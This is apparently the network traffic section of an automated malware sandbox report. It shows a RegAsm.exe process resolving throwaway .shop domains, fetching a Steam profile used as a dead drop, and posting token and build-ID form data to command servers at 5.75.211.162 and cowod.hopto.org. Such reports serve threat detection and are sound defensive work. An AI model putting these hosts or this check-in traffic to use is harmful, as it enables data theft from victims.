Sep 26, 2024 22:57:40.438393116 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.438431025 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.438436031 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.438450098 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.438462973 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.438496113 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.438519001 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.438891888 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.438941956 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.438973904 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.438992023 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.439017057 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.439037085 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.439299107 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.439342976 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.439372063 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.439404011 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.439434052 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.439454079 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.439789057 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.439830065 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.439856052 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.439868927 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.439902067 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.439902067 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440165043 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440207005 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440237999 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440257072 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440279007 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440295935 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440469980 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440511942 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440545082 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440562010 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440586090 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440603971 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440884113 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440926075 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.440949917 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.440962076 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441006899 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441006899 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441200018 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441241026 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441270113 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441287041 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441308975 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441334963 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441639900 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441679955 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441706896 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441719055 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441747904 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441767931 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441787004 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441833019 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441859007 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441870928 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.441899061 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441900015 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.441924095 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442472935 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442512989 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442545891 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442574978 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442601919 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442619085 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442641973 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442684889 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442711115 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442728043 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442749977 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442770004 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442774057 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442797899 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442837000 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442842007 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442853928 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442867041 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.442904949 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.442924023 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.443119049 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.443183899 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.443211079 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.443259954 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.443269968 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.443298101 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.443319082 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.443342924 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.443342924 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.443381071 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.456409931 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.456445932 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:40.456516981 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.456775904 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:40.456787109 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.103558064 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.103671074 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.104120016 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.104127884 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.105695963 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.105700016 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.105741978 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.105750084 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.501048088 CEST	49790	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.501100063 CEST	443	49790	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.501179934 CEST	49790	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.501425028 CEST	49790	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.501435041 CEST	443	49790	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.754235983 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.754329920 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.754348993 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.754394054 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.754434109 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:41.754482031 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.755374908 CEST	49789	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:41.755389929 CEST	443	49789	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:42.152378082 CEST	443	49790	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:42.152447939 CEST	49790	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:43.138422966 CEST	49790	443	192.168.2.4	5.75.211.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 22:56:21.395699024 CEST	59355	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:56:21.404028893 CEST	53	59355	1.1.1.1	192.168.2.4
Sep 26, 2024 22:56:58.547027111 CEST	54476	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:56:58.670456886 CEST	53	54476	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:01.653633118 CEST	62072	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:01.666192055 CEST	53	62072	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:02.799926043 CEST	59039	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:02.817178965 CEST	53	59039	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:04.760066032 CEST	51028	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:04.781219006 CEST	53	51028	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:05.702967882 CEST	60650	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:05.720144987 CEST	53	60650	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:06.633806944 CEST	65079	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:06.644205093 CEST	53	65079	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:07.550565958 CEST	58978	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:07.566868067 CEST	53	58978	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:08.494271040 CEST	49207	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:08.512521982 CEST	53	49207	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:08.733043909 CEST	62253	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:08.742791891 CEST	53	62253	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:09.478147030 CEST	54407	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:09.492532969 CEST	53	54407	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:09.655903101 CEST	51604	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:09.663192034 CEST	53	51604	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:10.922774076 CEST	58507	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:10.937336922 CEST	53	58507	1.1.1.1	192.168.2.4
Sep 26, 2024 22:57:27.591532946 CEST	59003	53	192.168.2.4	1.1.1.1
Sep 26, 2024 22:57:27.598846912 CEST	53	59003	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 22:56:21.395699024 CEST	192.168.2.4	1.1.1.1	0xea4b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:56:58.547027111 CEST	192.168.2.4	1.1.1.1	0x9ad1	Standard query (0)	dbsmena.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:01.653633118 CEST	192.168.2.4	1.1.1.1	0x25a7	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:02.799926043 CEST	192.168.2.4	1.1.1.1	0xede7	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:04.760066032 CEST	192.168.2.4	1.1.1.1	0x2a4d	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:05.702967882 CEST	192.168.2.4	1.1.1.1	0x32e9	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:06.633806944 CEST	192.168.2.4	1.1.1.1	0xf543	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:07.550565958 CEST	192.168.2.4	1.1.1.1	0x8a30	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:08.494271040 CEST	192.168.2.4	1.1.1.1	0x4bba	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:08.733043909 CEST	192.168.2.4	1.1.1.1	0xd8c6	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:09.478147030 CEST	192.168.2.4	1.1.1.1	0xee2b	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:09.655903101 CEST	192.168.2.4	1.1.1.1	0xccd1	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:10.922774076 CEST	192.168.2.4	1.1.1.1	0xf905	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:27.591532946 CEST	192.168.2.4	1.1.1.1	0x90fb	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 22:56:21.404028893 CEST	1.1.1.1	192.168.2.4	0xea4b	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:56:58.670456886 CEST	1.1.1.1	192.168.2.4	0x9ad1	No error (0)	dbsmena.com	172.105.54.160	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:01.666192055 CEST	1.1.1.1	192.168.2.4	0x25a7	No error (0)	ghostreedmnu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:01.666192055 CEST	1.1.1.1	192.168.2.4	0x25a7	No error (0)	ghostreedmnu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:02.817178965 CEST	1.1.1.1	192.168.2.4	0xede7	No error (0)	gutterydhowi.shop	104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:02.817178965 CEST	1.1.1.1	192.168.2.4	0xede7	No error (0)	gutterydhowi.shop	172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:04.781219006 CEST	1.1.1.1	192.168.2.4	0x2a4d	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:04.781219006 CEST	1.1.1.1	192.168.2.4	0x2a4d	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:05.720144987 CEST	1.1.1.1	192.168.2.4	0x32e9	No error (0)	vozmeatillu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:05.720144987 CEST	1.1.1.1	192.168.2.4	0x32e9	No error (0)	vozmeatillu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:06.644205093 CEST	1.1.1.1	192.168.2.4	0xf543	No error (0)	drawzhotdog.shop	104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:06.644205093 CEST	1.1.1.1	192.168.2.4	0xf543	No error (0)	drawzhotdog.shop	172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:07.566868067 CEST	1.1.1.1	192.168.2.4	0x8a30	No error (0)	fragnantbui.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:07.566868067 CEST	1.1.1.1	192.168.2.4	0x8a30	No error (0)	fragnantbui.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:08.512521982 CEST	1.1.1.1	192.168.2.4	0x4bba	No error (0)	stogeneratmns.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:08.512521982 CEST	1.1.1.1	192.168.2.4	0x4bba	No error (0)	stogeneratmns.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:08.742791891 CEST	1.1.1.1	192.168.2.4	0xd8c6	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:09.492532969 CEST	1.1.1.1	192.168.2.4	0xee2b	No error (0)	reinforcenh.shop	104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:09.492532969 CEST	1.1.1.1	192.168.2.4	0xee2b	No error (0)	reinforcenh.shop	172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:09.663192034 CEST	1.1.1.1	192.168.2.4	0xccd1	No error (0)	steamcommunity.com	23.197.127.21	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:10.937336922 CEST	1.1.1.1	192.168.2.4	0xf905	No error (0)	ballotnwu.site	104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:10.937336922 CEST	1.1.1.1	192.168.2.4	0xf905	No error (0)	ballotnwu.site	172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 26, 2024 22:57:27.598846912 CEST	1.1.1.1	192.168.2.4	0x90fb	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

5.75.211.162

dbsmena.com

ghostreedmnu.shop

gutterydhowi.shop

offensivedzvju.shop

vozmeatillu.shop

drawzhotdog.shop

fragnantbui.shop

stogeneratmns.shop

ballotnwu.site

cowod.hopto.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49777	45.132.206.251	80	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:57:08.749386072 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 5765 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 22:57:08.749386072 CEST	5765	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------EHCAEGDHJKFHJK
Sep 26, 2024 22:57:09.489940882 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 20:57:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	104.102.49.254	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:22 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:22 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 20:56:22 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=e6b154f79f8b68c89a4f9739; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 20:56:22 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 20:56:22 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 20:56:22 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 20:56:22 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:23 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:24 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
